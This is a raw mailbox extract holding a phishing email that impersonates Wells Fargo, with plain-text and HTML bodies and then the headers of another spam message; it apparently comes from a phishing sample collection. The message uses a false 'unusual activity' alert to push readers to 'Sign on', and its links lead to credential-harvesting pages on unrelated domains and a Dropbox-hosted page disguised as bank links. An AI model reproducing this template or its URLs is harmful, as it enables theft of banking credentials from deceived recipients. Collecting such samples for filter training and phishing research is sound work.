X-netcomp-MailScanner-From: no-reply@online.wells.com
X-Spam-Status: No
Status: O
X-Status: 
X-Keywords:                  
X-UID: 117

You will not see this in a MIME-aware mail reader.
--===============1623347319==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

=20
     	 wellsfargo.com=09=20
=20=20=20
=20=20=20=20
Dear Valued Customer,
 Confirm the last transaction on your checking account, Their is unusual ac=
tivity noticed on your account, We needed you to sign on for transaction ve=
rification.   Sign on to Account Online.
=20
 Sign on to Account Online anytime to review your recent account activity o=
r to update your account information.
=20
 We appreciate the opportunity to serve you.
=20
 Sincerely,
 Customer Service=09=20
   wellsfargo.com | Fraud Information Center  Please do not reply to this e=
mail directly. To ensure a prompt and secure response, sign on to email us.
=20
 If you wish to view the address we shipped the card to, please sign on, go=
 to Messages & Alerts, and open the copy of this message in your secure inb=
ox. FA9A95ED05AD2D0DE0440021283BC044=20=20=20=20=09=20
=20=20=20
--=20
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.


--===============1623347319==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<!doctype html>
<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso=
-8859-1"/>
</head>
<body>
<table cellpadding=3D"0" cellspacing=3D"0" style=3D"font-family: arial, san=
s-serif; font-style: normal; font-variant-ligatures: normal; font-variant-c=
aps: normal; font-weight: normal; letter-spacing: normal; orphans: 2; text-=
align: start; text-indent: 0px; text-transform: none; white-space: normal; =
widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-co=
lor: rgb(255, 255, 255); color: rgb(80, 0, 80); font-size: 12.8px; line-hei=
ght: normal; width: 600px; border-top: 4px solid rgb(221, 222, 206); border=
-bottom: 1px solid rgb(153, 153, 153);">
	<tbody>
		<tr>
			<td style=3D"font-family: arial, sans-serif; margin: 0px; width: 62px;">
			<div align=3D"center" style=3D"margin-bottom: 15px; margin-left: 10px; t=
ext-align: center;"><img alt=3D"Wells Fargo" border=3D"0" src=3D"https://ci=
5.googleusercontent.com/proxy/izzjp0Z02P0UV8p5zu2_hFcd_3LF2SzOQgLew7UtfXS8h=
Ji6dMnxa-VA20hzXwj1q4qbW9b9za3f-agWra5etk--gJPQptbiqR4XdJ_N6-tIo3c1PB6k0Zb0=
2g=3Ds0-d-e1-ft#https://static.wellsfargo.com/messagecenter/static/images/w=
f_logo.gif" /></div>
			</td>
			<td style=3D"font-family: arial, helvetica, sans-serif; margin: 0px; pad=
ding-right: 5px; text-align: right; vertical-align: top; font-size: 12px;">=
<a data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps=
://www.wellsfargo.com/&amp;source=3Dgmail&amp;ust=3D1481897693300000&amp;us=
g=3DAFQjCNHdLQ3CqLX7gGCBMmA2xjrVRNEaZw" href=3D"https://www.wellsfargo.com/=
" style=3D"color: rgb(51, 102, 153); font-size: 12px; font-family: arial, h=
elvetica, sans-serif;" target=3D"_blank"><b>wellsfargo.com</b></a></td>
		</tr>
	</tbody>
</table>

<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"font-style=
: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-w=
eight: normal; letter-spacing: normal; orphans: 2; text-align: start; text-=
indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spa=
cing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, =
255); color: rgb(80, 0, 80); line-height: normal; width: 600px; font-family=
: arial, helvetica, sans-serif; font-size: 12px;">
	<tbody>
		<tr>
			<td style=3D"font-family: arial, sans-serif; margin: 0px;">
			<h1 style=3D"font-family: arial, helvetica, sans-serif; margin: 21px 0px=
 23px 10px; font-size: 19px;"><span style=3D"color: rgb(0, 0, 0);">Dear&nbs=
p;<span>Valued</span>&nbsp;Customer,</span></h1>
			<font color=3D"#000000">Confirm the last transaction on your checking ac=
count, Their is unusual activity noticed on your account, We needed you to =
sign on for transaction verification.</font>

			<div style=3D"font-family: arial, sans-serif; line-height: 10px;"><span =
style=3D"color: rgb(0, 0, 0);">&nbsp;</span></div>
			<span style=3D"font-family: arial, sans-serif; color: rgb(0, 0, 0);"><a =
data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://w=
ww.grupobrm.com/MarileeZiegler/view/enroll/wellsfargo/index.html&amp;source=
=3Dgmail&amp;ust=3D1481897693300000&amp;usg=3DAFQjCNHmFQLewkUHjj_fx7vUUamhv=
bcxJg" href=3D"http://www.toafrica.pt/base/view/signup/wellsfargo/index.htm=
l" rel=3D"nofollow" style=3D"color: rgb(17, 85, 204);" target=3D"_blank">Si=
gn on to Account Online</a>.<br />
			<br />
			Sign on to Account Online anytime to review your recent account activity=
 or to update your account information.<br />
			<br />
			We appreciate the opportunity to serve you.<br />
			<br />
			Sincerely,<br />
			Customer Service</span></td>
		</tr>
		<tr>
			<td style=3D"font-family: arial, sans-serif; margin: 0px;">
			<div style=3D"margin: 16px 0px 12px; padding: 3px 0px 3px 10px; backgrou=
nd-color: rgb(247, 248, 243); border-top: 1px solid rgb(179, 178, 178); bor=
der-bottom: 1px solid rgb(179, 178, 178); vertical-align: top;"><a data-saf=
eredirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://www.wells=
fargo.com&amp;source=3Dgmail&amp;ust=3D1481897693300000&amp;usg=3DAFQjCNGwl=
yXlVe1zbdgl3Q3vzekbgeTzAQ" href=3D"http://www.wellsfargo.com/" style=3D"col=
or: rgb(51, 102, 153); font-size: 12px; font-family: arial, helvetica, sans=
-serif;" target=3D"_blank"><b>wellsfargo.com</b></a><span>&nbsp;</span>|<sp=
an>&nbsp;</span><a data-saferedirecturl=3D"https://www.google.com/url?hl=3D=
en&amp;q=3Dhttp://www.wellsfargo.com&amp;source=3Dgmail&amp;ust=3D148189769=
3300000&amp;usg=3DAFQjCNGwlyXlVe1zbdgl3Q3vzekbgeTzAQ" href=3D"http://www.we=
llsfargo.com/" style=3D"color: rgb(51, 102, 153); font-size: 12px; font-fam=
ily: arial, helvetica, sans-serif;" target=3D"_blank">Fraud Information Cen=
ter</a></div>

			<div style=3D"font-size: 12px; font-family: arial, helvetica, sans-serif=
; color: rgb(102, 102, 102);">
			<div style=3D"padding-left: 10px; font-size: 11px; margin-bottom: 15px; =
color: rgb(102, 102, 102);"><b>Please do not reply to this email directly.<=
/b><span>&nbsp;</span>To ensure a prompt and secure response, sign on to em=
ail us.<br />
			<br />
			If you wish to view the address we shipped the card to, please<span>&nbs=
p;</span><a data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;=
q=3Dhttps://dl.dropboxusercontent.com/s/vfmh41f2h667saa/dewanamuh.html&amp;=
source=3Dgmail&amp;ust=3D1481897693300000&amp;usg=3DAFQjCNEe-7DnweBh-0Zn7WO=
07S8DSURzMQ" href=3D"https://dl.dropboxusercontent.com/s/vfmh41f2h667saa/de=
wanamuh.html" style=3D"color: rgb(51, 102, 153); font-size: 12px;" target=
=3D"_blank">sign on</a>, go to Messages &amp; Alerts, and open the copy of =
this message in your secure inbox.</div>

			<div style=3D"padding-left: 10px; font-size: 11px; margin-bottom: 15px; =
color: rgb(102, 102, 102);">FA9A95ED05AD2D0DE0440021283BC0<wbr />44&nbsp;&n=
bsp;</div>
			</div>
			</td>
		</tr>
	</tbody>
</table>
<br />--=20
<br />This message has been scanned for viruses and
<br />dangerous content by
<a href=3D"http://www.mailscanner.info/"><b>MailScanner</b></a>, and is
<br />believed to be clean.
</body>
</html>

--===============1623347319==--

From jose@monkey.org Sun Mar 19 17:43:37 2017 +0000
Return-Path: upgrade_support@e7marketing.com
Delivered-To: jose@monkey.org
X-FDA: 72635669274.23.page43_3cc6d61b34a55
X-Spam-Summary: 10,1,0,4cbb414ffa25e836,d41d8cd98f00b204,upgrade_support@e7marketing.com,:upgrade_support@e7marketing.com,RULES_HIT:41:46:72:150:152:379:962:967:973:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1431:1436:1437:1516:1517:1518:1533:1535:1543:1575:1588:1589:1592:1594:1711:1714:1730:1767:1778:1792:2084:2525:2527:2549:2560:2563:2682:2685:2827:2859:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4117:4321:4605:4860:5007:6114:6119:6238:6261:6642:6687:7652:7801:8583:8603:9025:9040:9388:10004:10049:10214:10231:10346:11658:11783:11889:11914:12043:12074:12075:12114:12291:12438:12517:12519:12555:12561:12683:12764:12776:12986:13139:13237:14051:14093:14110:14181:14196:14721:14829:14849:21080:21212:21433:21451:21524:30022:30026:30054,0,RBL:65.60.57.178:@e7marketing.com:.lbl8.mailshell.net-62.8.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,M
X-HE-Tag: page43_3cc6d61b34a55
X-Filterd-Recvd-Size: 6866
Received: from node02.tmddedicated102.com (node02.tmddedicated102.com [65.60.57.178])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 19 Mar 2017 17:43:37 +0000 (UTC)
Received: from [197.211.63.46] (port=38638 helo=[10.33.74.192])
	by node02.tmddedicated102.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <upgrade_support@e7marketing.com>)
	id 1cpWC5-0007RM-EL; Sun, 19 Mar 2017 03:28:06 -0500
Content-Type: multipart/alternative; boundary="===============2055819735=="
MIME-Version: 1.0
Subject: email-alert@verification.com =?utf-8?Q?=E2=9C=94?=
To: Recipients <upgrade_support@e7marketing.com>
